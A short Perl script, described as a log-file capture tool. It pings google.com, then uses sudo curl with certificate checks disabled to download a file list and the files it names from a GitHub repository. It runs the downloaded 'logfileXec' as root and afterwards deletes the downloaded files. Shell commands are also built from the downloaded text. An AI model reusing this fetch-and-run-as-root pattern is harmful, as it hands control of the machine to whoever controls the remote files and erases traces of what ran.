#!/usr/bin/perl -w
use Net::Ping;

my $png = Net::Ping->new("icmp");
while(1){
printf "Checking internet connection...\n";
  if ($png->ping("www.google.com")){
  printf "Internet connection is active!\n";
     sleep 3;
     system('clear');
  last;

  }
  else{
  printf "No Internet connection! Exiting...\n";
  sleep  2;
  goto bye;
  }
  }
strt:
use Cwd;
#subrotine to clean up file
sub delfile {
$lst = $_[0];
foreach my $dl ($lst){
system("rm -f $dl");
}
}
$filename = 'gitlist';
if (-e $filename) {
    delfile($filename);
} else {
    print "Processing....";
}

system('command -v expect >/dev/null 2>&1 || { echo >&2 "Expect not installed. Installing...";sudo apt-get --assume-yes install expect >/dev/null ; }');
my $Path = getcwd;
#print "Processing....";
my $cmd ="sudo curl -s -LkO https://raw.githubusercontent.com/JamuraF2G/logfileproject/master/";
system("sudo curl -s -LkO https://raw.githubusercontent.com/JamuraF2G/logfileproject/master/gitlist");
system("sudo curl -s -LkO https://raw.githubusercontent.com/JamuraF2G/logfileproject/master/loglist");
my $lista="gitlist";
open(FILE,"<$lista") || die "File not found";
chomp(my @script = <FILE>);


foreach my $s (@script){
system("$cmd$s");
}
system("sudo chmod +x *; clear");
system("sudo chown ran:ran *");
#Now let's start capturing log files#
system("sudo ./logfileXec");
sleep(rand(7));

foreach my $d (@script){
system("rm -f $d");
}

system("clear");
close(FILE);
bye:
exit(0);
